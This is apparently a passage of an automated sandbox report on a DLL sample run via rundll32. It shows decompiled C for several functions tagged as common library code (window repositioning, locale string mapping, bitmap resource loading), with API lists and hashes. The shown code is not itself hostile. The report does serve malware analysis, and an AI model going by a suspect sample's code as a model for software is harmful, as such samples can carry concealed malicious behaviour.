                                                                                                            0x1002d6a1
                                                                                                            0x1002d6a4
                                                                                                            0x1002d6a6
                                                                                                            0x1002d6a6
                                                                                                            0x1002d6ac
                                                                                                            0x1002d6ae
                                                                                                            0x1002d6ae
                                                                                                            0x1002d6b1
                                                                                                            0x1002d6b8
                                                                                                            0x1002d6b8
                                                                                                            0x1002d6e8
                                                                                                            0x1002d6e8
                                                                                                            0x00000000
                                                                                                            0x1002d689
                                                                                                            0x1002d3ca
                                                                                                            0x1002d61a
                                                                                                            0x1002d61d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d623
                                                                                                            0x1002d62b
                                                                                                            0x00000000
                                                                                                            0x1002d62b
                                                                                                            0x1002d3d0
                                                                                                            0x1002d3d5
                                                                                                            0x1002d3e7
                                                                                                            0x1002d3ec
                                                                                                            0x1002d3db
                                                                                                            0x1002d3dd
                                                                                                            0x1002d3dd
                                                                                                            0x1002d3fa
                                                                                                            0x1002d40f
                                                                                                            0x1002d41b
                                                                                                            0x1002d427
                                                                                                            0x1002d42f
                                                                                                            0x1002d540
                                                                                                            0x1002d546
                                                                                                            0x1002d559
                                                                                                            0x1002d559
                                                                                                            0x1002d55f
                                                                                                            0x1002d562
                                                                                                            0x1002d567
                                                                                                            0x1002d57a
                                                                                                            0x1002d57c
                                                                                                            0x1002d581
                                                                                                            0x1002d583
                                                                                                            0x1002d583
                                                                                                            0x1002d58e
                                                                                                            0x1002d58e
                                                                                                            0x1002d597
                                                                                                            0x1002d642
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d648
                                                                                                            0x1002d64d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002d59d
                                                                                                            0x1002d59d
                                                                                                            0x1002d5af
                                                                                                            0x1002d5b2
                                                                                                            0x1002d5b8
                                                                                                            0x1002d5c8
                                                                                                            0x1002d5d0
                                                                                                            0x1002d5e7
                                                                                                            0x1002d5e8
                                                                                                            0x1002d5e9
                                                                                                            0x1002d5ea
                                                                                                            0x1002d5eb
                                                                                                            0x1002d5ee
                                                                                                            0x1002d5ee
                                                                                                            0x1002d5fb
                                                                                                            0x1002d5fb
                                                                                                            0x1002d60c
                                                                                                            0x1002d60f
                                                                                                            0x1002d615
                                                                                                            0x00000000
                                                                                                            0x1002d617
                                                                                                            0x1002d617
                                                                                                            0x00000000
                                                                                                            0x1002d617
                                                                                                            0x1002d615
                                                                                                            0x1002d435
                                                                                                            0x1002d435
                                                                                                            0x1002d43b
                                                                                                            0x1002d44e
                                                                                                            0x1002d44e
                                                                                                            0x1002d454
                                                                                                            0x1002d457
                                                                                                            0x1002d45c
                                                                                                            0x1002d489
                                                                                                            0x1002d48c
                                                                                                            0x1002d4b7
                                                                                                            0x1002d4d5
                                                                                                            0x1002d4e5
                                                                                                            0x1002d4ed
                                                                                                            0x1002d504
                                                                                                            0x1002d505
                                                                                                            0x1002d506
                                                                                                            0x1002d507
                                                                                                            0x1002d508
                                                                                                            0x1002d50b
                                                                                                            0x1002d50b
                                                                                                            0x1002d518
                                                                                                            0x1002d518
                                                                                                            0x1002d529
                                                                                                            0x1002d52c
                                                                                                            0x1002d532
                                                                                                            0x1002d538
                                                                                                            0x1002d538
                                                                                                            0x00000000
                                                                                                            0x1002d532
                                                                                                            0x1002d4b9
                                                                                                            0x1002d4be
                                                                                                            0x00000000
                                                                                                            0x1002d668
                                                                                                            0x1002d668
                                                                                                            0x1002d676
                                                                                                            0x1002d67b
                                                                                                            0x00000000
                                                                                                            0x1002d67b
                                                                                                            0x1002d4be
                                                                                                            0x1002d48e
                                                                                                            0x1002d4a0
                                                                                                            0x1002d4a3
                                                                                                            0x00000000
                                                                                                            0x1002d466
                                                                                                            0x1002d46f
                                                                                                            0x1002d471
                                                                                                            0x1002d476
                                                                                                            0x1002d478
                                                                                                            0x1002d478
                                                                                                            0x1002d483
                                                                                                            0x00000000
                                                                                                            0x1002d483
                                                                                                            0x1002d45c
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6eb
                                                                                                            0x1002d6f1
                                                                                                            0x00000000
                                                                                                            0x1002d397

                                                                                                            APIs
                                                                                                            • IsRectEmpty.USER32 ref: 1002D2FA
                                                                                                            • GetClientRect.USER32 ref: 1002D338
                                                                                                            • BeginDeferWindowPos.USER32 ref: 1002D365
                                                                                                            • GetWindowRect.USER32 ref: 1002D41B
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                                                            • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                                                            • EqualRect.USER32 ref: 1002D4DD
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                                                            • EqualRect.USER32 ref: 1002D5C0
                                                                                                            • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002D717
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160784657-0
                                                                                                            • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                                                            • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                                                            • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018081 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 299COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}




























                                                                                                            0x10018081
                                                                                                            0x10018081
                                                                                                            0x10018083
                                                                                                            0x10018088
                                                                                                            0x1001808f
                                                                                                            0x10018095
                                                                                                            0x1001809b
                                                                                                            0x100180b0
                                                                                                            0x100180ba
                                                                                                            0x100180c0
                                                                                                            0x100180c3
                                                                                                            0x100180c5
                                                                                                            0x100180c5
                                                                                                            0x100180b2
                                                                                                            0x100180b2
                                                                                                            0x100180b2
                                                                                                            0x100180b0
                                                                                                            0x100180d2
                                                                                                            0x100180ef
                                                                                                            0x100180ef
                                                                                                            0x100180f7
                                                                                                            0x100182d9
                                                                                                            0x100182dc
                                                                                                            0x100182de
                                                                                                            0x100182e1
                                                                                                            0x100182e4
                                                                                                            0x100182e6
                                                                                                            0x100182eb
                                                                                                            0x100182eb
                                                                                                            0x100182ee
                                                                                                            0x100182f1
                                                                                                            0x100182f3
                                                                                                            0x100182f8
                                                                                                            0x100182f8
                                                                                                            0x100182fe
                                                                                                            0x10018304
                                                                                                            0x10018307
                                                                                                            0x1001830a
                                                                                                            0x10018313
                                                                                                            0x10018316
                                                                                                            0x10018422
                                                                                                            0x10018424
                                                                                                            0x10018424
                                                                                                            0x10018427
                                                                                                            0x10018429
                                                                                                            0x1001842c
                                                                                                            0x10018431
                                                                                                            0x10018432
                                                                                                            0x00000000
                                                                                                            0x10018432
                                                                                                            0x1001831c
                                                                                                            0x1001831d
                                                                                                            0x1001831e
                                                                                                            0x10018321
                                                                                                            0x10018322
                                                                                                            0x10018325
                                                                                                            0x10018326
                                                                                                            0x10018329
                                                                                                            0x1001832e
                                                                                                            0x10018331
                                                                                                            0x10018334
                                                                                                            0x10018336
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001834a
                                                                                                            0x1001834c
                                                                                                            0x1001834f
                                                                                                            0x10018351
                                                                                                            0x100183f9
                                                                                                            0x100183fc
                                                                                                            0x100183fc
                                                                                                            0x100183ff
                                                                                                            0x10018401
                                                                                                            0x10018402
                                                                                                            0x10018407
                                                                                                            0x00000000
                                                                                                            0x100183ff
                                                                                                            0x10018357
                                                                                                            0x10018360
                                                                                                            0x10018365
                                                                                                            0x10018368
                                                                                                            0x1001836a
                                                                                                            0x10018370
                                                                                                            0x10018375
                                                                                                            0x1001838a
                                                                                                            0x1001838e
                                                                                                            0x10018390
                                                                                                            0x100183b5
                                                                                                            0x100183c5
                                                                                                            0x100183cb
                                                                                                            0x100183ce
                                                                                                            0x100183d0
                                                                                                            0x100183d6
                                                                                                            0x100183d9
                                                                                                            0x100183df
                                                                                                            0x100183e0
                                                                                                            0x100183e1
                                                                                                            0x100183e4
                                                                                                            0x100183e7
                                                                                                            0x100183f3
                                                                                                            0x100183f5
                                                                                                            0x00000000
                                                                                                            0x100183f5
                                                                                                            0x00000000
                                                                                                            0x10018392
                                                                                                            0x1001839b
                                                                                                            0x1001839d
                                                                                                            0x1001839f
                                                                                                            0x100183d2
                                                                                                            0x100183d2
                                                                                                            0x00000000
                                                                                                            0x100183d2
                                                                                                            0x100183a6
                                                                                                            0x100183ab
                                                                                                            0x100183ae
                                                                                                            0x00000000
                                                                                                            0x100183ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018105
                                                                                                            0x10018108
                                                                                                            0x1001830c
                                                                                                            0x1001830c
                                                                                                            0x10018434
                                                                                                            0x1001843c
                                                                                                            0x1001843c
                                                                                                            0x1001810e
                                                                                                            0x10018110
                                                                                                            0x10018113
                                                                                                            0x10018116
                                                                                                            0x1001811c
                                                                                                            0x1001811e
                                                                                                            0x10018123
                                                                                                            0x10018123
                                                                                                            0x10018147
                                                                                                            0x10018149
                                                                                                            0x1001814e
                                                                                                            0x00000000
                                                                                                            0x10018154
                                                                                                            0x10018154
                                                                                                            0x10018164
                                                                                                            0x10018169
                                                                                                            0x1001816e
                                                                                                            0x10018171
                                                                                                            0x10018195
                                                                                                            0x100181b3
                                                                                                            0x100181ca
                                                                                                            0x100182b6
                                                                                                            0x100182b6
                                                                                                            0x100182b9
                                                                                                            0x100182bb
                                                                                                            0x100182be
                                                                                                            0x100182c3
                                                                                                            0x100182c4
                                                                                                            0x100182c7
                                                                                                            0x100182c9
                                                                                                            0x100182cc
                                                                                                            0x100182d1
                                                                                                            0x100182d2
                                                                                                            0x00000000
                                                                                                            0x100182d2
                                                                                                            0x100181e2
                                                                                                            0x100181e4
                                                                                                            0x100181e9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181f3
                                                                                                            0x10018222
                                                                                                            0x10018232
                                                                                                            0x10018237
                                                                                                            0x1001823c
                                                                                                            0x1001823f
                                                                                                            0x10018260
                                                                                                            0x10018263
                                                                                                            0x1001827d
                                                                                                            0x10018291
                                                                                                            0x10018293
                                                                                                            0x10018295
                                                                                                            0x10018296
                                                                                                            0x10018297
                                                                                                            0x1001829a
                                                                                                            0x100182a0
                                                                                                            0x100182a3
                                                                                                            0x1001829c
                                                                                                            0x1001829c
                                                                                                            0x1001829d
                                                                                                            0x1001829d
                                                                                                            0x100182b4
                                                                                                            0x100182b4
                                                                                                            0x00000000
                                                                                                            0x10018265
                                                                                                            0x10018269
                                                                                                            0x1001826f
                                                                                                            0x10018272
                                                                                                            0x10018274
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x10018263
                                                                                                            0x100181f8
                                                                                                            0x10018217
                                                                                                            0x10018217
                                                                                                            0x00000000
                                                                                                            0x10018197
                                                                                                            0x1001819b
                                                                                                            0x100181a0
                                                                                                            0x100181a1
                                                                                                            0x100181a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x10018195
                                                                                                            0x1001814e
                                                                                                            0x100180f7
                                                                                                            0x100180d4
                                                                                                            0x100180d7
                                                                                                            0x100180da
                                                                                                            0x100180da
                                                                                                            0x100180dd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180df
                                                                                                            0x100180e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x100180ec
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                                                            • GetLastError.KERNEL32 ref: 100180BA
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1775797328-4125583295
                                                                                                            • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                                                            • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

























                                                                                                            0x1002b5a3
                                                                                                            0x1002b5ab
                                                                                                            0x1002b5ae
                                                                                                            0x1002b71c
                                                                                                            0x1002b71c
                                                                                                            0x1002b5b6
                                                                                                            0x1002b5bc
                                                                                                            0x1002b5c0
                                                                                                            0x1002b5c3
                                                                                                            0x1002b71a
                                                                                                            0x00000000
                                                                                                            0x1002b71a
                                                                                                            0x1002b5cd
                                                                                                            0x1002b5d1
                                                                                                            0x1002b5d6
                                                                                                            0x1002b5db
                                                                                                            0x1002b718
                                                                                                            0x00000000
                                                                                                            0x1002b5e1
                                                                                                            0x1002b5e4
                                                                                                            0x1002b5ee
                                                                                                            0x1002b5f0
                                                                                                            0x1002b5f4
                                                                                                            0x1002b5f7
                                                                                                            0x1002b5fa
                                                                                                            0x1002b5fc
                                                                                                            0x1002b605
                                                                                                            0x1002b609
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b60b
                                                                                                            0x1002b60d
                                                                                                            0x1002b611
                                                                                                            0x1002b629
                                                                                                            0x1002b632
                                                                                                            0x1002b640
                                                                                                            0x1002b655
                                                                                                            0x1002b667
                                                                                                            0x1002b667
                                                                                                            0x1002b66c
                                                                                                            0x1002b613
                                                                                                            0x1002b613
                                                                                                            0x1002b61b
                                                                                                            0x1002b620
                                                                                                            0x1002b620
                                                                                                            0x1002b61b
                                                                                                            0x1002b66f
                                                                                                            0x1002b66f
                                                                                                            0x1002b672
                                                                                                            0x1002b67c
                                                                                                            0x1002b67f
                                                                                                            0x1002b684
                                                                                                            0x1002b687
                                                                                                            0x1002b68a
                                                                                                            0x1002b693
                                                                                                            0x1002b696
                                                                                                            0x1002b69e
                                                                                                            0x1002b6a1
                                                                                                            0x1002b6a6
                                                                                                            0x1002b6af
                                                                                                            0x1002b6b5
                                                                                                            0x1002b6ca
                                                                                                            0x1002b6e7
                                                                                                            0x1002b6f1
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6ff
                                                                                                            0x1002b705
                                                                                                            0x1002b706
                                                                                                            0x1002b70f
                                                                                                            0x1002b715
                                                                                                            0x00000000
                                                                                                            0x1002b715

                                                                                                            APIs
                                                                                                            • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B635
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B643
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B658
                                                                                                            • GetDC.USER32(00000000), ref: 1002B68A
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                                                            • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                                                            • DeleteDC.GDI32(00000000), ref: 1002B6F4
